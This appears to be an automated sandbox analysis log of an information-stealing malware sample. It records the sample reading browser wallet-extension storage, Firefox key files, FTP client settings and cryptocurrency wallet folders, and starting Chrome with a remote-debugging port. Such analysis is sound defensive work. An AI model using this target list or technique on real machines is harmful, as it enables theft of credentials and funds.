Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: Yara match File source: 0000000A.00000003.3166621569.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3093876019.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3231030291.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2978992587.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3007919799.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3135467108.0000000001011000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3220379720.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3233138119.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3261656724.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2972144892.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3071939046.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3228403714.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3135695992.0000000001017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3093554780.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3261656724.0000000000F99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3170698705.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3031373012.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3058481738.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3071848615.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3218476120.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 5228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 3716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 2576, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match File source: Process Memory Space: ba17bbfb21.exe PID: 3380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 5228, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 2576, type: MEMORYSTR
Source: Yara match File source: 00000009.00000002.3254990045.0000000000251000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3255076281.0000000000251000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2997152380.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3265209742.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3165593747.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 3716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 5312, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0021EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 6_2_0021EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0021DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 6_2_0021DF51
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E1307A sqlite3_transfer_bindings, 9_2_61E1307A
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D5E6 sqlite3_bind_int64, 9_2_61E2D5E6
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D595 sqlite3_bind_double, 9_2_61E2D595
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E0B431 sqlite3_clear_bindings, 9_2_61E0B431
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E037F3 sqlite3_value_frombind, 9_2_61E037F3
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D781 sqlite3_bind_zeroblob64, 9_2_61E2D781
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D714 sqlite3_bind_zeroblob, 9_2_61E2D714
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D68C sqlite3_bind_pointer, 9_2_61E2D68C
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D65B sqlite3_bind_null, 9_2_61E2D65B
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D635 sqlite3_bind_int, 9_2_61E2D635
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D9B0 sqlite3_bind_value, 9_2_61E2D9B0
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D981 sqlite3_bind_text16, 9_2_61E2D981
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D945 sqlite3_bind_text64, 9_2_61E2D945
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D916 sqlite3_bind_text, 9_2_61E2D916
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D8E7 sqlite3_bind_blob64, 9_2_61E2D8E7
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E038CA sqlite3_bind_parameter_count, 9_2_61E038CA
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E158CA sqlite3_bind_parameter_index, 9_2_61E158CA
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E038DC sqlite3_bind_parameter_name, 9_2_61E038DC
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D8B8 sqlite3_bind_blob, 9_2_61E2D8B8